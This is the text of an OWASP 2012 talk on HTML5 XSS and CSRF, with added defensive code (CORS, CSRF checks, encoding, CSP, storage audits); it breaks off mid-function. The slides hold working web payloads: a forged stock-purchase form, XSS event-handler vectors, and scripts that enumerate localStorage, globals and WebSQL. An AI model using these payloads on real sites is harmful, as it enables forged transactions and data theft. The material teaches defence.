XSS & CSRF with HTML5
Attack, Exploit and Defense

Shreeraj Shah
Blueinfy Solutions Pvt. Ltd.
shreeraj.shah@blueinfy.net


OWASP
OWASP AppSecUSA 2012

                       Copyright © The OWASP Foundation
                       Permission is granted to copy, distribute and/or modify this document
                       under the terms of the OWASP License.




                       The OWASP Foundation
                       http://www.owasp.org
Who Am I?
http://shreeraj.blogspot.com
shreeraj@blueinfy.com
http://www.blueinfy.com
Twitter @shreeraj

- Founder & Director
  - Blueinfy & iAppSecure Solutions Pvt. Ltd.
- Past experience
  - Net Square (Founder), Foundstone (R&D/Consulting), Chase (Middleware), IBM (Domino Dev)
- Interest
  - Web security research
- Published research
  - Articles / Papers – SecurityFocus, O'Reilly, DevX, InformIT etc.
  - Tools – DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.
  - Advisories – .Net, Java servers etc.
  - Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc.
- Books (Author)
  - Web 2.0 Security – Defending Ajax, RIA and SOA
  - Hacking Web Services
  - Web Hacking




                                                                            OWASP
                                            2
HTML5 VECTORS – ATTACK SURFACE
HTML5 – Attacks on the rise …

Evolution of HTML5
- 1991 – HTML started (plain and simple)
- 1996 – CSS & JavaScript (welcome to the world of XSS and browser security)
- 2000 – XHTML1 (growing concerns and attacks on browsers)
- 2005 – AJAX, XHR, DOM (attack cocktail and surface expansion)
- 2009 – HTML5 (here we go… new surface, architecture and defense) – HTML+CSS+JS
Modern Browser Model

[Figure: layered browser model. Presentation: HTML5 + CSS, API (Media, Geo etc.) & Messaging, Silverlight and Flash plug-ins, Mobile. Process & Logic: JavaScript, DOM/Events, Parser/Threads, WebSQL, Cache, Storage, FileSystem. Network & Access: XHR 1 & 2, WebSocket, Plug-in Sockets, Browser Native Network Services. Core Policies: SOP/CORS/Content-Sec, Sandbox.]
HTML5 Architecture & Threat Model

[Figure: a single DOM/page application – HTML/CSS, JavaScript and DOM running inside the browser sandbox (origin policy), with Storage, WebSQL, IndexedDB, FileSystem and Cache APIs, Messaging APIs, Geolocation and other APIs; it reaches over the Internet through XHR, WebSockets and native calls to the target application and to cross-domain applications.]
CSRF WITH HTML5
CSRF Attack Vector

[Figure: CSRF attack with a live session. Actors: Client/Victim Browser, Attacker's Site, Authentication Server, Web Store Application Server, Database Server. Sequence: Login → Success – cookie set; the victim visits the attacker's page; the attacker sends a CSRF payload; the browser replays the request with the session cookie → Success.]

Successful exploitation …
•SOP bypass
•Cookie Replay
SOP bypass and Cookie Replay – Basic Type

GET Request
  IMG SRC
  <img src="http://host/?command">

  SCRIPT SRC
  <script src="http://host/?command">

  IFRAME SRC
  <iframe src="http://host/?command">

POST Request
  <script type="text/javascript" language="JavaScript">
     document.foo.submit();
  </script>
Streams – name/value pairs are gone …

[Figure: request bodies an HTML5 application sends instead of form name/value pairs – JSON, XML, JS-Script, JS-Object, JS-Array]
CSRF injection – splitting and forcing …

<html>
<body>
<FORM NAME="buy" ENCTYPE="text/plain"
action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST">
    <input type="hidden" name='<?xml version' value='"1.0"?
><methodCall><methodName>stocks.buy</methodName><params><param
><value><string>MSFT</string></value></param><param><value><double>2
6</double></value></param></params></methodCall>'>
</FORM>
<script>document.buy.submit();</script>
</body>
</html>




CSRF with XHR and CORS bypass
[Figure: Modern Browser Model diagram, repeated from the "Modern Browser Model" slide]
XHR – Level 2 powering CSRF

- The XHR object of HTML5 is very powerful
  - Allows interesting features like cross-origin requests and binary upload/download
- xhr.responseType can be set to "text", "arraybuffer", "document" and "blob"
- Also, for posting a data stream: DOMString, Document, FormData, Blob, File, ArrayBuffer etc.
CORS & XHR – ingredients for CSRF

- Before HTML5 – cross-domain requests were not possible through XHR (SOP applies)
- HTML5 – allows cross-origin calls with XHR Level 2
- CORS – Cross Origin Resource Sharing needs to be followed (OPTIONS/preflight calls)
- Adding extra HTTP headers (Access-Control-Allow-Origin and a few others)
CORS based HTTP Headers

Request
  Origin
  Access-Control-Request-Method (preflight)
  Access-Control-Request-Headers (preflight)
Response
  Access-Control-Allow-Origin
  Access-Control-Allow-Credentials
  Access-Control-Expose-Headers
  Access-Control-Max-Age (preflight)
  Access-Control-Allow-Methods (preflight)
  Access-Control-Allow-Headers (preflight)
XHR – Stealth POST/GET

CSRF – powered by CORS and XHR
- Hence, they allow a stealth channel and possible silent exploitation
- One-way CSRF with any stream, since XHR allows a raw stream from the browser (XML, JSON, binary as well)
- Two-way CSRF (POST and read both – in case Access-Control-Allow-Origin is set to *)
Exploiting the use case

- CORS preflight bypass – certain Content-Types bypass the preflight HTTP request
- Forcing cookie replay by "withCredentials"
- Internal network scanning and tunneling
- Information harvesting (internal crawling)
- Stealth browser shell – post XSS (Allow-Origin: *)
- Business functionality abuse (upload and binary streams)
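The two mechanisms these CORS slides rest on, written out as server-side logic. This is an added example and not code from the talk: it decides which requests the browser sends without a preflight (so an OPTIONS handler alone cannot gate them) and builds the CORS response headers from an allowlist instead of "*". The allowlist and origins are constructed for the example.

```javascript
// Added example, not from the slides: a server-side CORS decision helper.
// It covers two things this section relies on: (1) which browser requests
// are sent WITHOUT a preflight, so an OPTIONS handler cannot be the only
// gate, and (2) how to answer the Origin header from an allowlist rather
// than with "*". The allowlist and origins used here are constructed.

// Per the Fetch standard a request skips the preflight when the method is
// GET/HEAD/POST and every header is CORS-safelisted; Content-Type is
// safelisted only for these three media types. A text/plain or
// multipart/form-data POST therefore reaches the server with no OPTIONS
// exchange at all (cookies included, if withCredentials was set).
const SAFELISTED_CONTENT_TYPES = [
  "application/x-www-form-urlencoded",
  "multipart/form-data",
  "text/plain",
];
const SAFELISTED_HEADERS = ["accept", "accept-language", "content-language", "content-type"];

function needsPreflight(method, headers) {
  if (!["GET", "HEAD", "POST"].includes(method.toUpperCase())) return true;
  for (const [name, value] of Object.entries(headers)) {
    const lower = name.toLowerCase();
    if (!SAFELISTED_HEADERS.includes(lower)) return true; // any custom header forces OPTIONS
    if (lower === "content-type") {
      const mediaType = value.split(";")[0].trim().toLowerCase();
      if (!SAFELISTED_CONTENT_TYPES.includes(mediaType)) return true; // e.g. application/json
    }
  }
  return false;
}

// Response headers for a request carrying `origin`. A grant is issued only
// to origins on the allowlist, and the origin is echoed back explicitly:
// "Access-Control-Allow-Origin: *" together with
// "Access-Control-Allow-Credentials: true" is rejected by browsers, and a
// wildcard without credentials is still a two-way channel for any site.
function corsResponseHeaders(origin, allowlist, options) {
  const { allowCredentials = false, preflight = false } = options || {};
  const headers = {};
  if (!origin || !allowlist.includes(origin)) return headers; // no grant: browser blocks the read
  headers["Access-Control-Allow-Origin"] = origin;
  headers["Vary"] = "Origin"; // shared caches must not serve one origin's grant to another
  if (allowCredentials) headers["Access-Control-Allow-Credentials"] = "true";
  if (preflight) {
    headers["Access-Control-Allow-Methods"] = "GET, POST";
    headers["Access-Control-Allow-Headers"] = "Content-Type, X-Requested-With";
    headers["Access-Control-Max-Age"] = "600";
  }
  return headers;
}
```

The text/plain form post on the earlier "CSRF injection" slide is exactly a request for which needsPreflight() returns false, which is why the server has to validate Content-Type and a CSRF token itself rather than trust the preflight.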


CSRF with XHR/HTML5

[Figure: step 1 – user establishing a session. The Client/Victim Browser sends a Login request (HTTPS) to the Web Store Application Server (backed by the Authentication Server and Database Server) and receives a session cookie.]
CSRF with XHR/HTML5

[Figure: step 2 – user making a buy over HTTP. The browser's JavaScript places an order through an XHR call to the JSON services of the Web Store Application Server; response: Success.]
CSRF with XHR/HTML5

[Figure: step 3 – the victim visits the attacker's page while the session is still live (not yet logged out); the attacker's site sends a CSRF payload.]

Leveraging the XHR call
• Content-Type chosen to avoid preflight
• "withCredentials" set to true
CSRF & HTML5
CSRF with XHR/HTML5

[Figure: step 4 – XHR initiates the HTTP buy request from the attacker's page; the Web Store Application Server answers Success – cookie replayed.]

Hence,
• Without the victim's consent or notice
• A stealth HTTP request is generated
• Silent exploitation takes place
CSRF & HTML5
CSRF with XHR/HTML5

[Figure: upload use case – the browser has a multi-part form for the business-layer function of uploading bulk orders to the Web Store Application Server; response: Success.]
CSRF/Upload - POC
CSRF with XHR/HTML5

[Figure: from the attacker's page, XHR initiates an HTTP multi-part upload; the Web Store Application Server answers Success – cookie replayed.]

Hence,
• Without the victim's consent or notice
• A stealth HTTP upload takes place
• Silent exploitation…
CSRF/Upload
Internal Scan – not scan but crawl as well …

[Figure: CSRF payload and stealth channel – the attacker's site on the Internet delivers a payload to the Client/Victim Browser, which then reaches Intranet hosts: Internal Web/App Server, Internal Web Mail, Internal HR Application.]
Internal Scan for CORS
Scan and Defend

Scan and look for
  Content-Type checking on the server side
  CORS policy scan
  Forms and uploads with tokens or not
Defense and Countermeasures
  Secure libraries for streaming HTML5/Web 2.0 content
  CSRF protections
  Stronger CORS implementation
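The three server-side checks this slide asks for, put together in one handler. This is an added example, not code from the talk: it validates the Origin/Referer, enforces the expected Content-Type (so the text/plain form trick and preflight-free XHR fail) and verifies a per-session CSRF token. The request, session and policy objects are constructed plain objects; a real handler would take them from its framework.

```javascript
// Added example, not from the slides: the server-side checks that close the
// CSRF paths shown in this section (text/plain form posts, "simple" XHR with
// withCredentials, multipart uploads). Request and session objects are
// constructed plain objects; in a real handler they come from the framework.

// Constant-time string comparison so token checking does not leak the
// position of the first mismatching byte through timing.
function constantTimeEqual(a, b) {
  const x = String(a), y = String(b);
  if (x.length !== y.length) return false;
  let diff = 0;
  for (let i = 0; i < x.length; i++) diff |= x.charCodeAt(i) ^ y.charCodeAt(i);
  return diff === 0;
}

function originOf(url) {
  try { return new URL(url).origin; } catch (e) { return null; }
}

// Three independent checks; all must pass for a state-changing request:
//  1. Origin (or, failing that, Referer) must be our own site, so the cookie
//     the browser replayed was not triggered from another site's page.
//  2. Content-Type must be what the endpoint expects, so a form with
//     ENCTYPE="text/plain" or a preflight-free XHR cannot pass off XML/JSON.
//  3. A per-session CSRF token must accompany the request and match.
function validateStateChangingRequest(req, session, policy) {
  const problems = [];
  const h = req.headers;
  const origin = h["origin"] || originOf(h["referer"] || "");
  if (!origin) problems.push("missing Origin/Referer");
  else if (origin !== policy.siteOrigin) problems.push("cross-site origin " + origin);

  const mediaType = (h["content-type"] || "").split(";")[0].trim().toLowerCase();
  if (mediaType !== policy.expectedContentType) {
    problems.push("unexpected Content-Type " + (mediaType || "(none)"));
  }

  const token = h["x-csrf-token"] || (req.body && req.body.csrf_token);
  if (!token || !session.csrfToken || !constantTimeEqual(token, session.csrfToken)) {
    problems.push("missing or invalid CSRF token");
  }
  return { ok: problems.length === 0, problems };
}

// Constructed sample traffic. The forged request mirrors the text/plain form
// post from the "CSRF injection" slide; the legitimate one is the site's own XHR.
const POLICY = { siteOrigin: "https://trade.example.com", expectedContentType: "application/xml" };
const SESSION = { csrfToken: "constructed-session-token-0123456789" };

const forgedRequest = {
  headers: { origin: "https://attacker.example", "content-type": "text/plain" },
  body: null,
};
const legitimateRequest = {
  headers: {
    origin: "https://trade.example.com",
    "content-type": "application/xml; charset=utf-8",
    "x-csrf-token": "constructed-session-token-0123456789",
  },
  body: "<methodCall>...</methodCall>",
};
```

Each check catches a different failure: the Origin check alone is defeated when a browser strips the header, the Content-Type check alone still lets a same-type XHR through, and the token check is what stops a cross-site request even when both of the others are wrong; keeping all three reported separately makes the rejection reason visible in logs.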




XSS WITH HTML5
XSS with HTML5 (tags, attributes and events)
[Figure: Modern Browser Model diagram, repeated from the "Modern Browser Model" slide]
HTML5 – Tags/Attributes/Events

Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, form controls (keys)
Attributes – form, submit, autofocus, sandbox, manifest, rel etc.
Events/Objects – Navigation (_self), editable content, Drag-and-Drop APIs, pushState (History) etc.
XSS variants

Media tags
Examples
   <video><source onerror="javascript:alert(1)">
   <video onerror="javascript:alert(1)"><source>
XSS variants

Exploiting autofocus
  <input autofocus onfocus=alert(1)>
  <select autofocus onfocus=alert(1)>
  <textarea autofocus onfocus=alert(1)>
  <keygen autofocus onfocus=alert(1)>




XSS variants

Form & Button etc.
   <form id="test" /><button form="test" formaction="javascript:alert(1)">test
   <form><button formaction="javascript:alert(1)">test

Etc … and more …
   Nice HTML5 XSS cheat sheet (http://html5sec.org/)
Scan and Defend

Scan and look for
  Reflected or persistent XSS spots with HTML5 tags
Defense and Countermeasures
  Have these tags/attributes added to your blacklist
  Standard XSS protections by encoding
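What "standard XSS protections by encoding" looks like against the HTML5 payload shapes on the previous slides. This is an added example, not the talk's code: three encoders chosen by the context the data lands in (text node, quoted attribute, JavaScript string), and a small template that uses all three. The inputs in the test are constructed from the autofocus/onfocus and video/onerror variants shown above.

```javascript
// Added example, not from the slides: context-aware output encoding, the
// "standard XSS protection by encoding" the slide recommends, applied to the
// HTML5 payload shapes listed above. Inputs are constructed; the point is that
// the encoder is chosen by where the data lands (text node, attribute value,
// JavaScript string), not by what the data looks like, so a denylist of tag
// names is not needed for correctness.

// Text between tags: the five characters that can start or end markup.
function encodeForHtmlText(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
  })[c]);
}

// Quoted attribute value: encode everything except alphanumerics, so the
// quote cannot be closed and no new attribute (onfocus, formaction, ...) can start.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => "&#x" + c.charCodeAt(0).toString(16) + ";");
}

// JavaScript string literal inside a <script> block: \xHH / \uHHHH escaping
// keeps quotes, backslashes and "</script>" inert.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100 ? "\\x" + code.toString(16).padStart(2, "0")
                        : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// A template that places untrusted values in three contexts.
function renderProfile(displayName, bio) {
  return [
    '<div class="profile" title="' + encodeForHtmlAttribute(displayName) + '">',
    "<p>" + encodeForHtmlText(bio) + "</p>",
    '<script>var who = "' + encodeForJsString(displayName) + '";</script>',
    "</div>",
  ].join("\n");
}

// Counts the angle brackets present in the output. The template contributes
// exactly twelve, so any additional one would have come from the data.
function markupCharsIn(html) {
  return (html.match(/[<>]/g) || []).length;
}
```

The denylist the slide mentions can still be useful as a detection signal (a WAF or log rule spotting `autofocus onfocus=` or `formaction=` in parameters), but it should not be the control the rendering depends on: the encoders above are safe for inputs that no list anticipated.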




CSP in Action – HTML5 defense …

Content Security Policy – defending the browser against possible post-attack scenarios
- Based on origin (SOP is the key)
- Allows a whitelisting mechanism for what "to do" and "not to do"
- It is possible to send a notification back to the application when a violation takes place
- Implemented by extra HTTP headers [browser-specific at the time: X-WebKit-CSP (Safari/Chrome), X-Content-Security-Policy (Firefox)]



Blocking Scripts

Content-Security-Policy: script-src 'self'
- Only allows scripts loaded from the page's own origin; inline scripts and eval() are blocked as a consequence
Other mechanisms
- 'unsafe-inline' – keyword that re-enables inline script; leaving it out keeps inline code blocked
- 'unsafe-eval' – keyword that re-enables eval-type calls; leaving it out keeps them blocked
Post-XSS defense can be crafted from these




Controlling Browser

connect-src – controlling WebSocket, XHR etc.
frame-src – sources of frames (clickjacking)
object-src – Flash, Silverlight etc.
media-src – controlling audio and video
img-src / style-src – image and style sources
default-src https:; – locking everything to SSL only
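A small evaluator for the directives listed on this slide and the previous one, added here as an example and not taken from the talk. It parses a policy header, applies the default-src fallback, and answers whether a given load, inline script or eval would be allowed. It handles 'self', 'none', '*', scheme sources such as https:, host sources with an optional "*." wildcard and the 'unsafe-inline'/'unsafe-eval' keywords; nonces and hashes (later CSP levels) are out of scope. The page origin and URLs in the test are constructed.

```javascript
// Added example, not from the slides: a small evaluator for the CSP
// directives listed above. It parses a header value, applies the
// default-src fallback, and answers whether a given load would be permitted.
// It covers 'self', 'none', '*', scheme sources (https:), host sources with
// an optional "*." wildcard, and the 'unsafe-inline' / 'unsafe-eval'
// keywords; it is not the full CSP grammar (no nonces or hashes).

function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// Fetch directives fall back to default-src when they are absent.
const FETCH_DIRECTIVES = ["script-src", "connect-src", "frame-src", "object-src",
                          "media-src", "img-src", "style-src", "font-src"];

function sourcesFor(policy, directive) {
  if (policy[directive]) return policy[directive];
  if (FETCH_DIRECTIVES.includes(directive) && policy["default-src"]) return policy["default-src"];
  return null; // nothing applies: the load is unrestricted by this policy
}

function sourceAllows(source, pageOrigin, url) {
  const target = new URL(url);
  if (source === "'none'") return false;
  if (source === "'self'") return target.origin === pageOrigin;
  if (source === "*") return true;
  if (source.startsWith("'")) return false;                   // other keywords never match a URL
  if (source.endsWith(":")) return target.protocol === source; // scheme-source, e.g. https:
  // host-source: [scheme://]host[:port], host may begin with "*."
  let scheme = null, rest = source;
  const m = /^([a-z][a-z0-9+.-]*):\/\/(.*)$/i.exec(source);
  if (m) { scheme = m[1].toLowerCase() + ":"; rest = m[2]; }
  const [hostRaw, port] = rest.split(":");
  const host = hostRaw.toLowerCase();
  if (scheme && scheme !== target.protocol) return false;
  if (port && port !== target.port) return false;
  return host.startsWith("*.")
    ? target.hostname.endsWith(host.slice(1))
    : target.hostname === host;
}

// Would loading `url` as `directive` (script-src, img-src, ...) be allowed on a page at pageOrigin?
function cspAllowsUrl(policy, directive, pageOrigin, url) {
  const sources = sourcesFor(policy, directive);
  return sources === null || sources.some((s) => sourceAllows(s, pageOrigin, url));
}

// Inline <script> blocks and eval() are governed by keywords, not URLs:
// once script-src (or default-src) applies they are blocked unless the
// keyword is present, which is why "script-src 'self'" alone neuters an
// injected inline payload.
function cspAllowsInlineScript(policy) {
  const sources = sourcesFor(policy, "script-src");
  return sources === null || sources.includes("'unsafe-inline'");
}
function cspAllowsEval(policy) {
  const sources = sourcesFor(policy, "script-src");
  return sources === null || sources.includes("'unsafe-eval'");
}
```

Running a proposed policy through such an evaluator against the page's real script, image and connection URLs before deployment is a cheap way to find what the policy would break, and to confirm that the injected inline payload of the next slide is indeed blocked.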




Example

Persistent XSS injected; note the X-WebKit-CSP header in the response:

HTTP/1.1 200 OK
Date: Wed, 12 Sep 2012 14:40:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-WebKit-CSP: script-src 'self'
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6146




Storage extraction with XSS
[Figure: Modern Browser Model diagram, repeated from the "Modern Browser Model" slide]
Web Storage Extraction

- Traditionally the browser has one place to store data – the cookie (limited and replayed)
- HTML5 – Storage API provided (Local and Session)
- Can hold global scoped variables
- http://www.w3.org/TR/webstorage/
Web Storage Extraction

- It is possible to steal stored values through XSS or via JavaScript
- Session hijacking – HttpOnly is of no use here
- getItem and setItem calls

XSS the box and scan through storage
Blind storage enumeration

if(localStorage.length){
          console.log(localStorage.length)
          for(var n=0;n<localStorage.length;n++){
                     var key=localStorage.key(n);   // key(n) walks stored keys only; for-in also yields Storage's own methods
                     console.log(key)
                     console.log(localStorage.getItem(key));
          }
}
Above code allows extraction of all storage variables




File System Storage

- HTML5 provides a virtual file system with filesystem APIs
    window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem;
- It becomes a full-blown local file system for the application, inside the sandbox
- It empowers the application




                                                OWASP
                           46
File System Storage

It provides a temporary or permanent file system
   var filesys;                                   // handle kept for later file operations
   function catcherror(e) { console.error(e); }  // error callback required by requestFileSystem
   function init() {
       window.requestFileSystem(window.TEMPORARY, 1024*1024,
          function(filesystem) {
             filesys = filesystem;
          }, catcherror);
   }
The app can have a full filesystem in place now.




Sensitive information in the filesystem

Assuming the app is creating a profile on the local system




Extraction through XSS

Once there is an entry point – game over!




Single DOM/One Page App - XSS

- Applications run with a "rich" DOM
- JavaScript sets several variables and parameters while loading – GLOBALS
- These hold sensitive information; what if they are GLOBAL and remain for the life of the application?
- They can be retrieved with XSS
- HTTP requests and responses go through JavaScript (XHR) – what about those variables?



Blind Enumeration

// Walk every property of window and print the string-valued ones
for(var i in window){
  var obj=window[i];
   try{
        if(typeof(obj)=="string"){
           console.log(i);
           console.log(obj.toString());
        }
     }catch(ex){}   // some host objects throw on access
}




Global Sensitive Information Extraction from DOM

- HTML5 apps run on a single DOM
- Having several key global variables, objects and arrays
   var arrayGlobals = ['my@email.com', "12141hewvsdr9321343423mjfdvint", "test.com"];
- Post-DOM-based exploitation is possible, harvesting all these values.




Global Sensitive Information Extraction from DOM
for(var i in window){
  var obj=window[i];
  if(obj!==null && obj!==undefined){     // original test (||) was always true and lacked braces
      var type = typeof(obj);
      if(type=="object"||type=="string")
      {
           console.log("Name:"+i)
           try{
              var my=JSON.stringify(obj);   // throws on circular structures; skipped by the catch
              console.log(my)
           }catch(ex){}
       }
  }
}



Scan and Defend

Scan and look for
  Scanning storage
Defense and Countermeasures
  Do not store sensitive information in localStorage or in globals
  XSS protection
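"Scanning storage" from the defender's side: the enumeration shown on the previous slides, turned into an audit a developer can run before release to find session identifiers, tokens and e-mail addresses sitting in Web Storage or in globals. This is an added example, not code from the talk. The FakeStorage class and the sample globals are constructed so the audit runs outside a browser; in a page you would pass window.localStorage, window.sessionStorage and window (with a baseline snapshot of built-in names taken on a blank page).

```javascript
// Added example, not from the slides: a developer-side audit that walks Web
// Storage and the page's global variables looking for values that should
// never live there (session identifiers, JWTs, e-mail addresses, long hex
// tokens). It is the defensive use of the same enumeration the slides show.
// The FakeStorage class and the sample globals are constructed so the audit
// runs outside a browser; in a page you would pass window.localStorage,
// window.sessionStorage and window.

const SENSITIVE_KEY_NAME = /session|token|auth|passw|secret|api[-_]?key/i;
const VALUE_PATTERNS = [
  { kind: "jwt",       re: /^eyJ[\w-]+\.[\w-]+\.[\w-]*$/ }, // base64url of a JSON header
  { kind: "email",     re: /^[^\s@]+@[^\s@]+\.[^\s@]+$/ },
  { kind: "hex-token", re: /^[0-9a-f]{32,}$/i },           // session ids, API keys, hashes
];

function classifyValue(value) {
  if (typeof value !== "string") return null;
  const hit = VALUE_PATTERNS.find((p) => p.re.test(value));
  return hit ? hit.kind : null;
}

// Works against anything with the Storage interface: length, key(i), getItem(k).
function auditStorage(storage, label) {
  const findings = [];
  for (let i = 0; i < storage.length; i++) {
    const key = storage.key(i);
    const kind = classifyValue(storage.getItem(key));
    const nameHit = SENSITIVE_KEY_NAME.test(key);
    if (kind || nameHit) findings.push({ where: label, key, reason: kind || "sensitive key name" });
  }
  return findings;
}

// Globals: own enumerable properties of the global object, minus a baseline
// snapshot of the browser's built-ins (taken on an empty page), so only the
// application's own variables are inspected. Arrays are scanned element-wise.
function auditGlobals(globalObj, baselineNames) {
  const findings = [];
  for (const name of Object.keys(globalObj)) {
    if (baselineNames.has(name)) continue;
    const value = globalObj[name];
    for (const v of Array.isArray(value) ? value : [value]) {
      const kind = classifyValue(v);
      if (kind) findings.push({ where: "global", key: name, reason: kind });
    }
  }
  return findings;
}

// Minimal stand-in for window.localStorage (constructed for this example).
class FakeStorage {
  constructor(entries) { this.map = new Map(Object.entries(entries)); }
  get length() { return this.map.size; }
  key(i) { return Array.from(this.map.keys())[i] ?? null; }
  getItem(k) { return this.map.has(k) ? this.map.get(k) : null; }
}

// Constructed sample state for the audit; the array mirrors the slide's arrayGlobals.
const sampleStorage = new FakeStorage({
  theme: "dark",
  sessionid: "9f1c4e2b7a6d5c3e1f0a9b8c7d6e5f4a",
  user_email: "alice@example.com",
});
const sampleGlobals = {
  appVersion: "3.1",
  arrayGlobals: ["my@email.com", "12141hewvsdr9321343423mjfdvint", "test.com"],
  authToken: "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhbGljZSJ9.constructedsig",
};
```

Every finding this produces is a value that any script running in the origin, including an injected one, can read with the code on the earlier slides; the remediation is to keep such values in HttpOnly cookies or server-side session state and to scope application state to a closure or module rather than window.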




SQLi & Blind Enumeration through XSS
[Figure: Modern Browser Model diagram, repeated from the "Modern Browser Model" slide]
SQL Injection

- WebSQL is part of the HTML5 specification; it provides an SQL database in the browser itself.
- Allows one-time data loading and offline browsing capabilities.
- Causes security concerns and potential injection points.
- Methods and calls are possible from JavaScript




SQL Injection

Through JavaScript one can harvest the entire local database.
Example
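Where the injection point in WebSQL actually sits, and the fix, as an added example that is not from the talk: the same lookup written once by string concatenation into executeSql() and once with a "?" placeholder bound through the params array. RecordingTx is a constructed stand-in for a WebSQL transaction so the two statements can be compared outside a browser; the table name and the input are constructed too.

```javascript
// Added example, not from the slides: the same profile lookup written twice
// against the WebSQL executeSql(sql, params, callback) API, once by string
// concatenation (the injection point the slide refers to) and once with "?"
// placeholders, which is the fix. RecordingTx is a constructed stand-in for a
// WebSQL transaction so the difference is visible outside a browser; the
// table name and input are constructed as well.

function findProfileUnsafe(tx, email, onResult) {
  // The value is spliced into the SQL text: any quote inside `email`
  // changes the statement's structure.
  tx.executeSql("SELECT * FROM profile WHERE email = '" + email + "'", [], onResult);
}

function findProfileSafe(tx, email, onResult) {
  // The value travels as a bound parameter; the SQL text is constant
  // whatever the input contains.
  tx.executeSql("SELECT * FROM profile WHERE email = ?", [email], onResult);
}

// Records every executeSql call instead of running it.
class RecordingTx {
  constructor() { this.calls = []; }
  executeSql(sql, params, callback) {
    this.calls.push({ sql, params: params.slice() });
    if (callback) callback(this, { rows: { length: 0, item() { return null; } } });
  }
}

// Runs both variants on one input and returns what each sent to the database.
function compareQueries(email) {
  const tx = new RecordingTx();
  findProfileUnsafe(tx, email, null);
  findProfileSafe(tx, email, null);
  return { unsafe: tx.calls[0], safe: tx.calls[1] };
}

// Number of single quotes in a statement: an odd count means the string
// literal was broken open by the input.
function quoteCount(sql) { return (sql.match(/'/g) || []).length; }
```

A perfectly legitimate input such as an address containing an apostrophe is enough to show the difference: the concatenated statement comes out with an odd number of quotes and is either a syntax error or, with a crafted value, a different query, while the parameterised statement never changes.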




Blind WebSQL Enumeration

var dbo;
var table;
var usertable;
for(var i in window){
    var obj = window[i];
    try{
        if(obj.constructor.name=="Database"){
            dbo = obj;
            obj.transaction(function(tx){
                // SQL literal uses single quotes, so the JavaScript string is double-quoted
                tx.executeSql("SELECT name FROM sqlite_master WHERE type='table'",
                    [], function(tx,results){
                        table = results;
                        // results exist only inside the callback: the call is asynchronous
                        if(table.rows.length>1)
                            usertable = table.rows.item(1).name;
                    }, null);
            });
        }
    }catch(ex){}
}



Blind WebSQL Enumeration

We run through all objects on window and keep the one whose constructor is "Database".
We issue a SELECT query directly against sqlite_master.
We grab the 1st table, leaving the WebKit bookkeeping table at the 0th entry.
Web Messaging and Worker Injection

[Browser architecture diagram: Presentation layer (HTML5 + CSS, API (Media, Geo etc.) & Messaging, Silverlight and Flash plug-ins, Mobile); Process & Logic layer (JavaScript, DOM/Events, Parser/Threads, WebSQL, Cache, Storage); Network & Access layer (XHR 1 & 2, WebSocket, Plug-in Sockets on top of the browser's native network services); Core Policies (SOP/CORS, Sandbox)]
Web Messaging

HTML5 has a new inter-frame communication system called Web Messaging.
With the postMessage() call the parent frame/domain can talk to the iframe.
The iframe can be loaded from a cross domain. Hence it creates issues: data/information validation, and data leakage by cross posting is possible.
worker.webkitPostMessage – faster transferable objects
Web Messaging - Scenario

If the postMessage() target origin is set to *, the page can be loaded in an iframe and the messaging can be hijacked.
Also, if the listener does not check the origin against a fixed value, the frame accepts messages from any domain – again an issue.
The incoming stream needs to be checked before it reaches innerHTML or eval().
An iframe or Web Worker can glue two streams – same domain or cross domain.
Origin check
Web Worker – Hacks!

Web Workers allow threading in HTML pages using JavaScript.
No need to use JavaScript calls like setTimeout(), setInterval(), XMLHttpRequest, and event handlers.
Totally async and well supported.
   [initialize] var worker = new Worker('task.js');
   [Messaging] worker.postMessage();
Web Worker – Hacks!

[Diagram: a Web Page with the current DOM spawns a Web Worker, a background thread on the same page that talks to the page only by messaging. The worker runs on the browser's JavaScript runtime platform with XHR, Location, Navigator etc. and Regex, Array, JSON etc. in scope, but its scope and objects give it no DOM access.]
Web Worker – Hacks!

Security issues
  It does not allow loading cross-domain worker scripts (http:, https:, javascript:, data: – no).
  It has some typical issues
    It allows the use of XHR. Hence in-domain and CORS requests are possible.
    It can cause DoS – if the user receives a stream that runs JavaScript in the worker thread. It has no access to the parent DOM though.
    Message validation is needed – else DOM-based XSS.
Web Worker – Hacks!

Example
<html>
<button onclick="Read()">Read Last Message</button>
<button onclick="stop()">Stop</button>
<output id="result"></output>

<script>
  function Read() {
    worker.postMessage({'cmd': 'read', 'msg': 'last'});
  }

  function stop() {
    worker.postMessage({'cmd': 'stop', 'msg': 'stop it'});
    alert("Worker stopped");
  }

  var worker = new Worker('message.js');

  // whatever the worker sends back is written straight into the page as HTML
  worker.addEventListener('message', function(e) {
    document.getElementById('result').innerHTML = e.data;
  }, false);
</script>
</html>
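The listener above writes e.data straight into innerHTML. As an added example (not the deck's code), here is a hardened receiver that applies the fixed-origin check from the Web Messaging scenario to window messages and validates the {cmd, msg} shape before rendering through textContent, which also covers the worker listener above; the allowlisted origins, the accepted commands and the output element are assumptions made for this demo.

```javascript
// Added example, not code from the deck: a hardened receiver for
// window.postMessage() and Worker messages. The allowlist, the {cmd, msg}
// message shape (taken from the worker example above) and the output element
// are assumptions made for this demo.
const ALLOWED_ORIGINS = new Set([
  "https://app.example.com",
  "https://widget.example.com",
]);
const ALLOWED_CMDS = new Set(["read", "stop"]);

// Exact-match origin check. A prefix test such as
// origin.startsWith("https://app.example.com") would also accept
// https://app.example.com.evil.test, so the whole string is compared.
function isTrustedOrigin(origin, allowlist = ALLOWED_ORIGINS) {
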